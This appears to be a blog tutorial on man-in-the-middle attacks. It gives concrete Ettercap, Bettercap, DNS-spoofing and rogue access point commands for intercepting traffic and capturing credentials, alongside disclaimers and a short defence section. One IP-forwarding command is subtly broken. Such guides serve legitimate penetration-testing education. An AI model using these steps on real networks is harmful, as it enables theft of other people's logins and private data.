A Man-in-the-Middle (MITM) attack is a common network attack where an attacker secretly intercepts and possibly alters the communication between two parties. This type of attack allows the attacker to capture sensitive information such as login credentials, session cookies, or other private data.


In this comprehensive guide, we will cover MITM attacks, including setting up the environment, understanding attack methods, and practical examples for educational and penetration testing purposes. Remember, this guide is intended for learning how to secure and test your own systems; unauthorized testing is illegal.


### **Man-in-the-Middle Attack: Full Penetration Testing Guide**


### **1. Understanding Man-in-the-Middle Attacks**


#### **Types of MITM Attacks**

- **ARP Spoofing**: Alters the ARP table of a network to redirect traffic through the attacker’s machine.

- **DNS Spoofing**: Manipulates DNS responses to redirect users to malicious websites.

- **HTTPS Stripping**: Downgrades HTTPS connections to HTTP to capture unencrypted data.

- **Wi-Fi Eavesdropping**: Using rogue Wi-Fi access points to intercept traffic.

  

### **2. Setting Up the Environment**


**Tools Required:**

- **Kali Linux**: Preferred for its built-in penetration testing tools.

- **Wireshark**: A network protocol analyzer.

- **Ettercap**: A suite for MITM attacks on LAN.

- **Bettercap**: An advanced MITM tool that supports a wide range of attacks.


#### **Step 1: Install and Update Tools**

Make sure your Kali Linux system is up-to-date:

```bash

sudo apt-get update && sudo apt-get upgrade

```


Install Ettercap and Bettercap if not already installed:

```bash

sudo apt-get install ettercap-graphical bettercap

```


### **3. ARP Spoofing Attack with Ettercap**


**Objective**: Intercept and capture data between a victim device and a gateway.


#### **Step 1: Identify Network Interfaces and Targets**


1. **Identify Your Network Interface**:

   ```bash

   ifconfig

   ```

   Note your interface, typically `eth0` for wired or `wlan0` for wireless.


2. **Scan the Network**:

   Use tools like `netdiscover` or `nmap` to identify active devices on your network.

   ```bash

   sudo netdiscover -r 192.168.1.0/24

   ```

   Replace `192.168.1.0/24` with your network range.


#### **Step 2: Start ARP Spoofing**


1. **Launch Ettercap in Graphical Mode**:

   ```bash

   sudo ettercap -G

   ```


2. **Configure Ettercap**:

   - **Set Interface**: Select your network interface.

   - **Scan for Hosts**: Use “Hosts” -> “Scan for hosts” to identify devices on the network.

   - **Add Targets**: Add the victim’s IP as Target 1 and the router/gateway IP as Target 2.

   - **Start ARP Poisoning**: Go to “Mitm” -> “Arp poisoning”, check “Sniff remote connections,” and start.


3. **Sniff Data**:

   - Use the built-in Sniffer to monitor intercepted traffic.

   - You can also capture packets using Wireshark.


#### **Step 3: Analyze the Data**


1. **Use Wireshark to Analyze**:

   Capture traffic on your network interface:

   ```bash

   sudo wireshark

   ```

   Look for sensitive data like HTTP POST requests, unencrypted credentials, etc.


### **4. HTTPS Stripping with Bettercap**


**Objective**: Downgrade HTTPS to HTTP to capture unencrypted credentials.


#### **Step 1: Launch Bettercap**


1. **Start Bettercap**:

   ```bash

   sudo bettercap -iface wlan0

   ```

   Replace `wlan0` with your interface.


2. **Start ARP Spoofing**:

   ```bash

   net.probe on

   net.sniff on

   arp.spoof on

   ```


#### **Step 2: HTTPS Stripping**


1. **Activate HTTPS Stripping**:

   ```bash

   hstshijack/hstshijack

   ```

   This downgrades HTTPS connections to HTTP.


2. **Monitor Credentials**:

   Captured credentials will appear in the Bettercap terminal.


### **5. DNS Spoofing with Ettercap**


**Objective**: Redirect traffic from legitimate sites to malicious ones.


#### **Step 1: Configure DNS Spoofing**


1. **Edit the Ettercap DNS Spoof File**:

   ```bash

   sudo nano /etc/ettercap/etter.dns

   ```

   Add entries to redirect domains:

   ```

   example.com A 192.168.1.100

   *.example.com A 192.168.1.100

   ```

   Replace `192.168.1.100` with the IP address of your malicious server.


2. **Launch DNS Spoof Attack**:

   In Ettercap, enable DNS spoofing under “Plugins” -> “dns_spoof”.


### **6. Wi-Fi MITM with Rogue Access Points**


**Objective**: Set up a rogue AP to capture traffic.


1. **Start Airbase-ng**:

   ```bash

   sudo airbase-ng -e "FreeWiFi" -c 6 wlan0

   ```

   - `-e "FreeWiFi"` sets the SSID.

   - `-c 6` specifies the channel.


2. **Set Up IP Forwarding**:

   ```bash

   sudo echo 1 > /proc/sys/net/ipv4/ip_forward

   ```


3. **Start DNS Spoofing with Bettercap**:

   Use Bettercap commands to intercept and analyze traffic on the rogue AP.


### **7. Defending Against MITM Attacks**


1. **Use Encryption**: Always use HTTPS and secure protocols.

2. **Enable VPNs**: Encrypts traffic, protecting it from interception.

3. **Use Secure DNS**: Implement DNSSEC or use secure DNS services like Cloudflare DNS.

4. **Avoid Untrusted Networks**: Don’t connect to open or untrusted Wi-Fi networks.

5. **Monitor ARP Tables**: Use tools like `arpwatch` to detect ARP spoofing.


### **Conclusion**


This guide has covered setting up and executing various MITM attacks in a controlled environment. It’s crucial to emphasize the ethical and legal boundaries when conducting such tests. Always obtain explicit permission before testing networks, and use this knowledge to enhance security rather than exploit vulnerabilities. For professional growth, consider further certifications and training in cybersecurity, such as OSCP, CEH, or CompTIA PenTest+.

Post a Comment

Post a Comment

Previous Post Next Post